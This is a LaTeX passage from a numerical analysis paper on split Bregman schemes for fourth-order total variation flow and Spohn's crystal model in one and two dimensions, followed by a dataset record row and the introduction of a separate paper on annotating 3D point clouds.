where $a = 450$ and $r=1/15$.
In \cite{GG10}, a class of initial data including \eqref{Eq:initial_data} as an example has been studied analytically. They rigorously proved that the solution becomes discontinuous instantaneously. Their analysis gives an exact profile of the fourth order gradient flow. Note that because of uniqueness of a solution, the symmetry of initial profile is preserved during evolution.
We can check that our numerical result shows the discontinuity and symmetry approximately (see Figure \ref{Fig:grad41}, \ref{Fig:grad42}). We use $K=J$, $N=200$, $\lambda=25h^{-3}$ and $\mu=15h^{-1}$. Furthermore, we note that we can compute until $\textbf{u}^k\approx \textbf{0}$ easily, because our scheme can be stable for $\tau=\lambda^{-1}=O(h^3)$.
\begin{figure}[tb]
\centering
\subfloat[][Evolution of numerical result]{\includegraphics[clip,scale=.55]{plot_gradient_flow4.pdf}\label{Fig:grad41}}
\subfloat[][Evolution of numerical result around $u^k\approx0$]{\includegraphics[clip,scale=.55]{plot_gradient_flow4-2.pdf}\label{Fig:grad42}}
\caption{Second numerical examples of the gradient flow.}
\label{Fig:gradient_flow2}
\end{figure}
\subsection{Example 3: Extinction time}
Our third example for \eqref{Eq:GradientFlow} is
\begin{equation}
u^0(x) = -\cos(2\pi x),
\end{equation}
which gives
\begin{equation}
\|u^0\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})} = \dfrac{1}{2\sqrt{2}\pi}
\end{equation}
Figure \ref{Fig:gradient_flow3} shows evolution of numerical solution for third example. We use $N-200$, $\lambda=20h^{-3}$ and $\mu=30h^{-1}$ for .Figure \ref{Fig:gradient_flow3}.
Recall that our numerical scheme can compute the evolution until $\textbf{u}^k\approx \textbf{0}$. easily. Furthermore, applying the extinction time estimate \cite[Theorem 3.11]{GK11} to one-dimensional torus implies
\begin{equation}
T^*(u^0) \le C^*\|u^0\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})},
\end{equation}
where $T^*(u^0)$ is the extinction time for the initial condition $u^0\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ and the constant $C^*$ satisfies $\|f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}\le C^*\int_{\mathbb{T}}|Df|$ for all $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$. It is easy to check that
\begin{equation}
\|f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})} = \left(\displaystyle\sum_{\xi\neq0}\dfrac{1}{4\pi^2}\xi^{-2}|\widehat{f}_T(\xi)|^2\right)^{1/2} \le \dfrac{1}{2\pi}\|f\|_{L^2(\mathbb{T})} \le \dfrac{1}{2\pi}\|f\|_{L^{\infty}(\mathbb{T})} \le\dfrac{1}{2\pi}\int_{\mathbb{T}}|Df|
\end{equation}
for all $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$.
Therefore, the extinction time for $u^0(x) = -\cos(2\pi x)$ can be estimated as
\begin{equation}
T^*(u^0) \le \dfrac{1}{4\sqrt{2}\pi^2} \approx 1.7911224 \times 10^{-2}.
\end{equation}
The numerical solution is expected to be ``extinct'' in
\begin{equation}
\label{Eq:ExtinctionTime}
k \le \dfrac{T^*(u^0)}{\tau} \lessapprox 1.7911224\tau^{-1}\times 10^{-2}.
\end{equation}
\begin{table}[tb]
\centering
\begin{tabular}{|c|c|c|c|c|c|}
\hline
parameters & $\tau$ & $T^*(u^0)/\tau\lessapprox$ & $\|\textbf{u}^k\|_{\infty}< 10^{-4}$ & $\|\textbf{u}^k\|_{\infty}< 10^{-6}$ & $\|\textbf{u}^k\|_{\infty}< 10^{-8}$ \rule[0mm]{0mm}{5mm}\\\hline\hline
$N=100$, $\lambda=h^{-3}$& $10^{-6}$ &17911&4032&41769&135755 \rule[0mm]{0mm}{5mm}\\\hline
$N=100$, $\lambda=10h^{-3}$&$10^{-7}$ &179112&40311&60579&333015 \rule[0mm]{0mm}{5mm}\\\hline
$N=200$, $\lambda=10h^{-3}$&$1.25\times 10^{-8}$ &1432898&322491&592634&1267927 \rule[0mm]{0mm}{5mm}\\\hline
\end{tabular}
\caption{Time step $k$ which satisfies $\|\textbf{u}^k\|_{\infty}<10^{-4}$, $10^{-6}$ and $10^{-8}$.}
\label{Table:ExtinctionTime}
\end{table}
Table \ref{Table:ExtinctionTime} shows the time step number $k$ such that $\|\textbf{u}^k\|_{\infty}<10^{-4}$, $10^{-6}$ and $10^{-8}$ for each parameters. This result shows that we can get $\|\textbf{u}^k\|_{\infty}\lessapprox \tau$ in reasonable iteration number which is expected in \eqref{Eq:ExtinctionTime}, however, it requires more iteration to obtain smaller $\|\textbf{u}^k\|_{\infty}$.
\begin{figure}[tb]
\centering
\subfloat[][Fourth order total variation flow]{\includegraphics[clip,scale=.7]{plot_extinction2.pdf}\label{Fig:gradient_flow3}}
\subfloat[][Spohn's fourth order model on $\mathbb{T}$]{\includegraphics[clip,scale=.7]{plot_gradient_flow_crystal.pdf}\label{Fig:gradcry}}
\caption{Numerical results for $u^0(x) = -\cos(2\pi x)$.}
\label{Fig:gradient_flow2}
\end{figure}
\subsection{Example 4: Spohn's model}
Our fourth example is split Bregman framework for Spohn's fourth order model \eqref{Eq:SpohnModel}, which is described in Section \ref{Sec:Spohn}.
Recall that we suppose that $p=3$ in this paper. Therefore we can apply the shrinkage operator \eqref{Eq:Shrink_for_Spohn} to split Bregman framework for Spohn's model.
Figure \ref{Fig:gradcry} shows the numerical example for $u^0(x) = -\cos(2\pi x)$, $\beta = 0.5$, $N=200$, $\lambda=50h^{-3}$ and $\mu=30h^{-1}$.
\section{Two dimensional case}
\label{Sec:TwoDim}
The fourth order total variation flow and Spohn's model on two dimensional torus $\mathbb{T}^2$ can be computed by the similar way to one dimensional case.
We can define $L^2_{\mathrm{av}}(\mathbb{T}^2)$, $H^1_{\mathrm{av}}(\mathbb{T}^2)$, $H^{-1}_{\mathrm{av}}(\mathbb{T}^2)$ and $(-\Delta_{\mathrm{av}})^{-1}:H^{-1}_{\mathrm{av}}(\mathbb{T}^2)\to H^1_{\mathrm{av}}(\mathbb{T}^2)$ by the generalized Fourier transform.
First, the fourth order isotropic total variation flow introduces the constraint problem
\begin{equation}
\mathop{\mathrm{minimize}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}\left\{\displaystyle\int_{\mathbb{T}^2}|(d_x,d_y)|+\dfrac{\lambda}{2}\|u-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}^2 : d_x = D_xu\mbox{ and }d_y = D_yu\right\},
\end{equation}
where $D_x$, $D_y$ is distributional derivative for each variable. Note that
\begin{equation}
\|u-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}^2=\|\nabla_x(-\Delta_{\mathrm{av}})^{-1}(u-f)\|_{L^2(\mathbb{T}^2)}^2+\|\nabla_y(-\Delta_{\mathrm{av}})^{-1}(u-f)\|_{L^2(\mathbb{T}^2)}^2,
\end{equation}
where $\nabla_x=\partial/\partial x$ and $\nabla_y = \partial/\partial y$.
Let $N_x$, $N_y$ be the partition number, $h_x=1/N_x$, $h_y = 1/N_y$, $x_n = nh_x$ and $y_n = nh_y$. Furthermore, we let $Q_{n_x,n_y} = [x_{n_x-1/2},x_{n_x+1/2})\times [y_{n_y-1/2},y_{n_y+1/2})$ and $\widehat{Q}_{n_x,n_y} = [x_{n_x-1},x_{n_x})\times [y_{n_y-1},y_{n_y})$. Then we consider the space of piecewise constant functions
\begin{subequations}
\begin{align}
V_h &= \left\{v_h :\mathbb{T}^2\to\mathbb{R} : v_h|_{Q_{n_x,n_y}}\in \mathbb{P}_0(Q_{n_x,n_y})\mbox{ for all }n_x,n_y\right\}.\\
V_{h0} &= \left\{v_h = \displaystyle\sum_{n_x=1,n_y=1}^{N_x,N_y}v_{n_x,n_y}\boldsymbol{1}_{Q_{n_x,n_y}}\in V_h : \sum_{n_x=1,n_y=1}^{N_x,N_y}v_{n_x,n_y}=0\right\},\\
\widehat{V}_h &= \left\{d_h : \Omega\to\mathbb{R} : d_h|_{\widehat{Q}_{n_x,n_y}}\in\mathbb{P}_0(\widehat{Q}_{n_x,n_y})\mbox{ for all }n_x,n_y\right\},
\end{align}
\end{subequations}
where $\Omega = [0,1)^2$. Any element $d_h\in \widehat{V}_h$ is described as $d_h = \sum_{n_x,n_y}d_{n_x,n_y}\boldsymbol{1}_{\widehat{Q}_{n_x,n_y}}$.
Let
\begin{subequations}
\begin{align}
\widetilde{\textbf{v}} &= (v_{1,1},\dots,v_{N_x,1},v_{1,2},\dots,v_{N_x,2},\dots,v_{N_x-1,N_y}, v_{N_x,N_y})^{\mathrm{T}}\in\mathbb{R}^{N_xN_y}\\
\textbf{v} &= (v_{1,1},\dots,v_{N_x,1},v_{1,2},\dots,v_{N_x,2},\dots,v_{N_x-1,N_y})^{\mathrm{T}}\in\mathbb{R}^{N_xN_y-1}\\
\textbf{d} &= (d_{1,1},\dots,d_{N_x,1},d_{1,2},\dots,d_{N_x,2},\dots,d_{N_x,N_y})^{\mathrm{T}}\in\mathbb{R}^{N_xN_y}
\end{align}
\end{subequations}
for $v_h\in V_{h0}$ and $d_h\in \widehat{V}_h$. We define $D_{xh},D_{yh}:V_{h0}\to\widehat{V}_h\cap L^2_{\mathrm{av}}(\Omega)$ as
\begin{equation}
D_{xh}v_h = \displaystyle\sum_{n_x,n_y}(v_{n_x,n_y}-v_{n_x-1,n_y})\boldsymbol{1}_{Q_{n_x,n_y}},\quad D_{yh}v_h = \sum_{n_x,n_y}(v_{n_x,n_y}-v_{n_x,n_y-1})\boldsymbol{1}_{Q_{n_x,n_y}}.
\end{equation}
This gives
\begin{subequations}
\begin{align}
\|d_{xh}-D_{xh}u_h\|_{L^2(\Omega)}^2 &= h_xh_y\|\textbf{d}_x-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}\|_2^2,\\
\|d_{yh}-D_{yh}u_h\|_{L^2(\Omega)}^2 &= h_xh_y\|\textbf{d}_y-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}\|_2^2,
\end{align}
\end{subequations}
where $R_{N_xN_y}\in\mathbb{R}^{(N_xN_y)\times(N_xN_y-1)}$ is defined as equation \eqref{Def:R} and $\nabla_{xh}$, $\nabla_{yh}$ are the discrete gradient
\begin{equation}
\nabla_{xh} = h_x^{-1}I_{N_y}\otimes S_{N_x},\quad \nabla_{yh}=h_y^{-1}S_{N_y}\otimes I_{N_x},
\end{equation}
where $I_N\in\mathbb{R}^{N\times N}$ is the identity matrix and $\otimes$ is the Kronecker product.
Then our discretized problem is described as
\begin{equation*}
\begin{array}{rl}
\displaystyle\mathop{\mathrm{minimize}}_{\textbf{u}\in \mathbb{R}^{N_xN_y-1},\textbf{d}_x, \textbf{d}_y\in \mathbb{R}^{N_xN_y}}&\Biggl\{\|\textbf{d}_{xy}\|_1+\dfrac{\lambda h_xh_y}{2}\left(\|K_x(\textbf{u}-\textbf{f})\|_2^2+\|K_y(\textbf{u}-\textbf{f})\|_2^2\right)\\
&\qquad +\dfrac{\mu h_xh_y}{2}\left(\|\textbf{d}_x-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}\|_2^2+\|\textbf{d}_y-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}\|_2^2\right)\Biggr\},
\end{array}
\end{equation*}
where $\textbf{d}_{xy}\in\mathbb{R}^{N_x\times N_y}$ is defined as
\begin{equation}
d_{xy,n_x,n_y} = \sqrt{d_{x,n_x,n_y}^2 + d_{y,n_x,n_y}^2}\mbox{ for all }1\le n_x\le N_x\mbox{ and }1\le n_y\le N_y,
\end{equation}
and $K_x, K_y\in\mathbb{R}^{(N_xN_y)\times(N_xN_y-1)}$ are deduced from $\nabla_x(-\Delta_{\mathrm{av}})^{-1}$ and $\nabla_y(-\Delta_{\mathrm{av}})^{-1}$, respectively. For example, we can approximate the inverse Laplacian by using
\begin{equation}
(-\Delta_{\mathrm{av}})_h = L_{N_xN_y}(\nabla_{xh}^{\mathrm{T}}\nabla_{xh}+\nabla_{yh}^{\mathrm{T}}\nabla_{yh})R_{N_xN_y}.
\end{equation}
This yields that our first scheme for two dimensional case is described as $K_x=J_x$ and $K_y=J_y$, where
\begin{equation}
J_x = \nabla_{xh}R_{N_xN_y}(-\Delta_{\mathrm{av}})_h^{-1},\quad J_y = \nabla_{yh}R_{N_xN_y}(-\Delta_{\mathrm{av}})_h^{-1}.
\end{equation}
If we let $h_x=h_y=h$, then it is required that $\lambda = O(h^{-4})$ and $\tau=O(h^{-2})$.
The split Bregman framework gives
\begin{subequations}
\begin{empheq}[left=\empheqlbrace]{align}
&\begin{aligned}
\textbf{u}^{k+1} = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N_xN_y-1}}&\left\{\dfrac{\lambda h_xh_y}{2}\left(\|K_x(\textbf{u}-\textbf{f})\|_2^2+\|K_y(\textbf{u}-\textbf{f})\|_2^2\right)\right.\\
&\qquad + \dfrac{\mu h_xh_y}{2}\left(\|\textbf{d}_x^k-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}-\boldsymbol{\alpha}_x^{k}\|_2^2\right.\\
&\qquad\qquad\left.\left.+\|\textbf{d}_y^k-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}-\boldsymbol{\alpha}_y^{k}\|_2^2\right)\right\},
\end{aligned}\label{Eq:2Du1}\\
&\begin{aligned}
(\textbf{d}_x^{k+1},\textbf{d}_y^{k+1}) = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{d}_x,\textbf{d}_y\in\mathbb{R}^{N_xN_y}}&\left\{\|\textbf{d}_{xy}\|_1+\dfrac{\mu h_xh_y}{2}\left(\|\textbf{d}_x-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_x^{k}\|_2^2\right.\right.\\
&\left.\left.\qquad+\|\textbf{d}_y-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_y^{k}\|_2^2\right)\right\},
\end{aligned}\label{Eq:2Dd1}\\
&\boldsymbol{\alpha}_x^{k+1} = \boldsymbol{\alpha}_x^k-\textbf{d}_x^{k+1}+h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1},\quad\boldsymbol{\alpha}_y^{k+1} = \boldsymbol{\alpha}_y^k-\textbf{d}_y^{k+1}+h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1},
\end{empheq}
\end{subequations}
where $\textbf{f}\in\mathbb{R}^{N_xN_y-1}$ is given data or $\textbf{f}=\textbf{u}^k$, $\boldsymbol{\alpha}_x^0=\boldsymbol{\alpha}_x^0 = \textbf{0}$, $\textbf{u}^0$ is given as $\textbf{0}$ or initial condition, and $\textbf{d}_x^0 = h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^0$, $\textbf{d}_y^0 = h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^0$.
Note that the equation \eqref{Eq:2Dd1} is essentially the same formulation as the one of split Bregman framework for second order isotropic problem, which is mentioned in \cite{GO09}.
The Euler-Lagrange equation for equation \eqref{Eq:2Dd1} yields
\begin{subequations}
\begin{align}
\dfrac{(\textbf{d}_x^{k+1})_n}{|(\textbf{d}_{xy}^{k+1})_n|}+\mu h_xh_y\left(\textbf{d}_x^{k+1}-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_x^k\right)_n=0,\label{Eq:Isotropic_ite_dx}\\
\dfrac{(\textbf{d}_y^{k+1})_n}{|(\textbf{d}_{xy}^{k+1})_n|}+\mu h_xh_y\left(\textbf{d}_y^{k+1}-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_y^k\right)_n=0\label{Eq:Isotropic_ite_dy}
\end{align}
\end{subequations}
for all $n=1,\dots, N_xN_y$.
We consider the approximation
\begin{equation}
\label{Eq:2D_singular_approx}
\dfrac{(\textbf{d}_x^{k+1})_n}{|(\textbf{d}_{xy}^{k+1})_n|} \approx \dfrac{(\textbf{d}_x^{k+1})_n}{|(\textbf{d}_{x}^{k+1})_n|}\cdot\dfrac{|s_{x,n}^k|}{s_n^k},\quad\dfrac{(\textbf{d}_y^{k+1})_n}{|(\textbf{d}_{xy}^{k+1})_n|} \approx \dfrac{(\textbf{d}_y^{k+1})_n}{|(\textbf{d}_{y}^{k+1})_n|}\cdot\dfrac{|s_{y,n}^k|}{s_n^k},
\end{equation}
where
\begin{equation*}
s_n^k = \sqrt{(s_{x,n}^k)^2+(s_{y,n}^k)^2},\quad s_{x,n}^k = (h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1}+\boldsymbol{\alpha}_x^k)_n,\quad s_{y,n}^k = (h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}+\boldsymbol{\alpha}_y^k)_n.
\end{equation*}
Applying them into equations \eqref{Eq:Isotropic_ite_dx} and \eqref{Eq:Isotropic_ite_dy} give the following shrinkage formula, which are equivalent to ones of \cite[Section 4.1]{GO09}:
\begin{equation*}
(d_x^{k+1})_n = \dfrac{s_{x,n}^k}{|s_{x,n}^k|}\max\left\{|s_{x,n}^k|-\dfrac{|s_{x,n}^k|}{\mu h_xh_ys_n^k},0\right\},\quad (d_y^{k+1})_n = \dfrac{s_{y,n}^k}{|s_{y,n}^k|}\max\left\{|s_{y,n}^k|-\dfrac{|s_{y,n}^k|}{\mu h_xh_ys_n^k},0\right\}.
\end{equation*}
Figure \ref{Fig:2D_Isotropic} shows the numerical result of fourth order isotropic total variation flow \eqref{Eq:FourthOrderTVFlow} in $\mathbb{T}^2$ with initial data $u^0(x,y) = x(x-1)y(y-1)-1/36$. We use $N_x=N_y=40$, $\lambda=5h^{-4}$ and $\mu=20h^{-2}$.
Next, the fourth order anisotropic total variation flow
\begin{equation}
u_t = -\Delta\left(\operatorname{div}\left(\dfrac{\nabla_xu}{|\nabla_xu|},\dfrac{\nabla_yu}{|\nabla_yu|}\right)\right).
\end{equation}
\begin{figure}[H]
\centering
\subfloat[][Fourth order isotropic total variation flow]{\includegraphics[clip,scale=1.5]{2Dplot_isotropic.png}\label{Fig:2D_Isotropic}}
\\
\subfloat[][Fourth order anisotropic total variation flow]{\includegraphics[clip,scale=1.5]{2Dplot_anisotropic.png}\label{Fig:2D_Anisotropic}}
\\
\subfloat[][Spohn's fourth order model on $\mathbb{T}^2$]{\includegraphics[clip,scale=1.5]{2Dplot_Spohn.png}\label{Fig:2D_Spohn}}
\caption{Numerical results of two-dimensional problems.}
\end{figure}
\noindent
Letting $F(u) = \int_{\mathbb{T}^2}\left(|D_xu|+|D_yu|\right)$ implies that formally we have
\begin{align*}
\left(\Delta\left(\operatorname{div}\left(\dfrac{\nabla_xu}{|\nabla_xu|},\dfrac{\nabla_yu}{|\nabla_yu|}\right)\right),v-u\right)_{H^{-1}_{\mathrm{av}}(\mathbb{T}^2)} &= \left(-\operatorname{div}\left(\dfrac{\nabla_xu}{|\nabla_xu|},\dfrac{\nabla_yu}{|\nabla_yu|}\right),v-u\right)_{L^2_{\mathrm{av}}(\mathbb{T}^2)}\\
&= \displaystyle\int_{\mathbb{T}^2}\left(\dfrac{\nabla_xu\overline{\nabla_xv}}{|\nabla_xu|}-|\nabla_xu|+\dfrac{\nabla_yu\overline{\nabla_yv}}{|\nabla_yu|}-|\nabla_yu|\right)\\
&\le F(v)-F(u),
\end{align*}
therefore $u_t\in-\partial_{H^{-1}_{\mathrm{av}}(\mathbb{T}^2)} F$. We apply the backward Euler method and obtain
\begin{equation}
u^{k+1} = \mathop{\mathrm{argmin}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}\left\{\displaystyle\int_{\mathbb{T}^2}\left(|D_xu|+|D_yu|\right)+\dfrac{1}{2\tau}\|u-u^k\|_{H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}^2\right\},
\end{equation}
which introduces the constraint problem
\begin{equation}
\mathop{\mathrm{minimize}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}\left\{\displaystyle\int_{\mathbb{T}^2}\left(|d_x|+|d_y|\right)+\dfrac{\lambda}{2}\|u-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T}^2)}^2 : d_x = D_xu\mbox{ and }d_y = D_yu\right\},
\end{equation}
This, combining with the split Bregman framework gives
\begin{subequations}
\begin{empheq}[left=\empheqlbrace]{align}
&\begin{aligned}
\textbf{u}^{k+1} = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N_xN_y-1}}&\left\{\dfrac{\lambda h_xh_y}{2}\left(\|K_x(\textbf{u}-\textbf{f})\|_2^2+\|K_y(\textbf{u}-\textbf{f})\|_2^2\right)\right.\\
&\qquad + \dfrac{\mu h_xh_y}{2}\left(\|\textbf{d}_x^k-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}-\boldsymbol{\alpha}_x^{k}\|_2^2\right.\\
&\qquad\qquad\left.\left.+\|\textbf{d}_y^k-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}-\boldsymbol{\alpha}_y^{k}\|_2^2\right)\right\},
\end{aligned}\label{Eq:2Du2}\\
&\textbf{d}_x^{k+1} = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{d}_x\in\mathbb{R}^{N_xN_y}}\left\{\|\textbf{d}_x\|_1+\dfrac{\mu h_xh_y}{2}\|\textbf{d}_x-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_x^{k}\|_2^2\right\}\label{Eq:2D_anisotropic_dx},\\
&\textbf{d}_y^{k+1} = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{d}_y\in\mathbb{R}^{N_xN_y}}\left\{\|\textbf{d}_y\|_1+\dfrac{\mu h_xh_y}{2}\|\textbf{d}_y-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_y^{k}\|_2^2\right\}\label{Eq:2D_anisotropic_dy},\\
&\boldsymbol{\alpha}_x^{k+1} = \boldsymbol{\alpha}_x^k-\textbf{d}_x^{k+1}+h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1},\quad\boldsymbol{\alpha}_y^{k+1} = \boldsymbol{\alpha}_y^k-\textbf{d}_y^{k+1}+h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}.
\end{empheq}
\end{subequations}
We can apply the shrinking method \eqref{Op:shrink} to equations \eqref{Eq:2D_anisotropic_dx} and \eqref{Eq:2D_anisotropic_dy}.
Figure \ref{Fig:2D_Anisotropic} presents the evolution of fourth order anisotropic total variation flow for $u^0(x,y) = x(x-1)y(y-1)-1/36$, $N_x=N_y=40$, $\lambda=5h^{-4}$ and $\mu=20h^{-2}$.
For second order anisotropic total variation flow, \L asica, Moll and Mucha \cite{LMM17} have considered rectangular domain $\Omega\subset\mathbb{R}^2$ or $\Omega=\mathbb{R}^2$ and rigorously proved that if the initial profile is piecewise constant, then the exact solution is piecewise constant.
We can infer from our numerical experiment \ref{Fig:2D_Anisotropic} that their theoretical result is true also for fourth order anisotropic total variation flow.
Finally, we consider two dimensional Spohn's fourth order model. The split Bregman framework provides
\begin{subequations}
\begin{empheq}[left=\empheqlbrace]{align}
&\begin{aligned}
\textbf{u}^{k+1} = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N_xN_y-1}}&\left\{\dfrac{\lambda h_xh_y}{2}\left(\|K_x(\textbf{u}-\textbf{f})\|_2^2+\|K_y(\textbf{u}-\textbf{f})\|_2^2\right)\right.\\
&\qquad + \dfrac{\mu h_xh_y}{2}\left(\|\textbf{d}_x^k-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}-\boldsymbol{\alpha}_x^{k}\|_2^2\right.\\
&\qquad\qquad\left.\left.+\|\textbf{d}_y^k-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}-\boldsymbol{\alpha}_y^{k}\|_2^2\right)\right\},
\end{aligned}\\
&\begin{aligned}
(\textbf{d}_x^{k+1},\textbf{d}_y^{k+1}) = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{d}_x,\textbf{d}_y\in\mathbb{R}^{N_xN_y}}&\left\{\beta\|\textbf{d}_{xy}\|_1+\dfrac{1}{p}\|\textbf{d}_{xy}\|_p^p\right.\\
&\qquad+\dfrac{\mu h_xh_y}{2}\left(\|\textbf{d}_x-h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_x^{k}\|_2^2\right.\\
&\qquad\qquad\left.\left.+\|\textbf{d}_y-h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}-\boldsymbol{\alpha}_y^{k}\|_2^2\right)\right\},
\end{aligned}\label{Eq:2DSpohn_d}\\
&\boldsymbol{\alpha}_x^{k+1} = \boldsymbol{\alpha}_x^k-\textbf{d}_x^{k+1}+h_x\nabla_{xh}R_{N_xN_y}\textbf{u}^{k+1},\quad\boldsymbol{\alpha}_y^{k+1} = \boldsymbol{\alpha}_y^k-\textbf{d}_y^{k+1}+h_y\nabla_{yh}R_{N_xN_y}\textbf{u}^{k+1}.
\end{empheq}
\end{subequations}
The Euler-Lagrange equation for \eqref{Eq:2DSpohn_d} can be approximated by equation \eqref{Eq:2D_singular_approx}.
In this paper, we always suppose that $p=3$. Note that the approximation \eqref{Eq:2D_singular_approx} implies
\begin{equation}
|(\textbf{d}_{xy}^{k+1})_n| \approx |(\textbf{d}_x^{k+1})_n|\cdot\dfrac{s_n^k}{|s_{x,n}^k|}\quad\mbox{ and }\quad|(\textbf{d}_{xy}^{k+1})_n| \approx |(\textbf{d}_y^{k+1})_n|\cdot\dfrac{s_n^k}{|s_{y,n}^k|}.
\end{equation}
We obtain approximated Euler-Lagrange equations
\begin{subequations}
\begin{align}
\beta\dfrac{(\textbf{d}_x^{k+1})_n}{|(\textbf{d}_{x}^{k+1})_n|}\cdot\dfrac{|s_{x,n}^k|}{s_n^k}+(\textbf{d}_x^{k+1})_n|(\textbf{d}_x^{k+1})_n|\cdot\dfrac{s_n^k}{|s_{x,n}^k|}+\mu h_xh_y((\textbf{d}_x^{k+1})_n-s_{x,n}^k)=0,\label{Eq:Spohn_ite_dx}\\
\beta\dfrac{(\textbf{d}_y^{k+1})_n}{|(\textbf{d}_{y}^{k+1})_n|}\cdot\dfrac{|s_{y,n}^k|}{s_n^k}+(\textbf{d}_y^{k+1})_n |(\textbf{d}_y^{k+1})_n|\cdot\dfrac{s_n^k}{|s_{y,n}^k|}+\mu h_xh_y((\textbf{d}_y^{k+1})_n-s_{y,n}^k)=0\label{Eq:Spohn_ite_dy}.
\end{align}
\end{subequations}
By the similar way to one dimensional case, we provide the shrinkage operators of the form
\begin{subequations}
\begin{align}
(\textbf{d}_x^{k+1})_n &= \dfrac{\mu h_xh_y|s_{x,n}^k|}{2s_n^k}\cdot\dfrac{s_{x,n}^k}{|s_{x,n}^k|}\left(-1+\sqrt{1+\dfrac{4s_n^k}{\mu h_xh_y|s_{x,n}^k|}\max\left\{|s_{x,n}^k|-\dfrac{\beta |s_{x,n}^k|}{\mu h_xh_ys_n^k},0\right\}}\right),\\
(\textbf{d}_y^{k+1})_n &= \dfrac{\mu h_xh_y|s_{y,n}^k|}{2s_n^k}\cdot\dfrac{s_{y,n}^k}{|s_{y,n}^k|}\left(-1+\sqrt{1+\dfrac{4s_n^k}{\mu h_xh_y|s_{y,n}^k|}\max\left\{|s_{y,n}^k|-\dfrac{\beta |s_{y,n}^k|}{\mu h_xh_ys_n^k},0\right\}}\right).
\end{align}
\end{subequations}
Figure \ref{Fig:2D_Spohn} shows the numerical result of split Bregman framework for Spohn's forth order model. We use $p=3$, $\beta=0.25$, $N_x=N_y=40$, $\lambda=1.25h^{-4}$ and $\mu=5h^{-2}$. Moreover, we use the initial value $u^0(x,y) = x(x-1)y(y-1)-1/36$, which is considered in \cite{KV10}. We can obtain the similar numerical result quite effectively by split Bregman framework.
\section{Conclusion}
In this study, we propose a new numerical scheme for the OSV model, fourth order total variation flow and Spohn's fourth order model. Our scheme is based on the split Bregman framework for the ROF model and second order total variation flow. We demonstrate several numerical examples for one dimensional and two dimensional problems under periodic boundary condition. We use the parameters $\lambda=O(h^{-3})$, $\mu=O(h^{-1})$ for one dimensional case, and $\lambda=O(h^{-4})$, $\mu=O(h^{-2})$ for two dimensional case. For fourth order total variation flow, our numerical results approximately represent the flat facet and discontinuity, which is expected by the theoretical result for the exact profile. Furthermore, we propose new shrinkage operators for Spohn's model. Numerical results for Spohn's model show facet and relaxation.
\section*{Acknowledgement}
A part of the work of the second author was done when he was a postdoc fellow at the University of Tokyo. Its hospitality is gratefully acknowledged. The work of the first author was partly supported by the Japan Society for the Promotion of Science through the grant No. 26220702 (Kiban S), No. 19H00639 (Kiban A), No. 18H05323 (Kaitaku), No. 17H01091 (Kiban A) and No. 16H03948 (Kiban B).
\bibliographystyle{plain}
| 2024-02-18T23:40:09.105Z | 2019-06-12T02:07:39.000Z | algebraic_stack_train_0000 | 1,478 | 13,656 |
|
proofpile-arXiv_065-7292 | \section{Introduction}
\label{introduction}
Two dimensional images have been the most popular digital representation of the world however, point cloud data is increasingly gaining center stage with applications in autonomous driving, robotics and augmented reality. While synthetic point cloud datasets have been around for some time \cite{shapenet2015}, prevalance of depth cameras such as \cite{8014901} and \cite{Zhang:2012:MKS:2225053.2225203} has led to creation of large 3D datasets \cite{Vladlen} created from applying techniques from \cite{Newcombe} on depth scans. Finally, we have also seen a number of point cloud datasets created using LIDAR scans of outdoor environments such as \cite{hackel2017isprs}, \cite{Behley2019ADF}.
The intensity and geometric information in point clouds provide a more detailed digital description of the world than images but their value in algorithmic analysis is fully realised when the points have an associated semantic label. However, annotating 3D point clouds is a time-consuming and labour intensive process owing to the size of the datasets and the limitations of the 2D interfaces in manipulating 3D data.
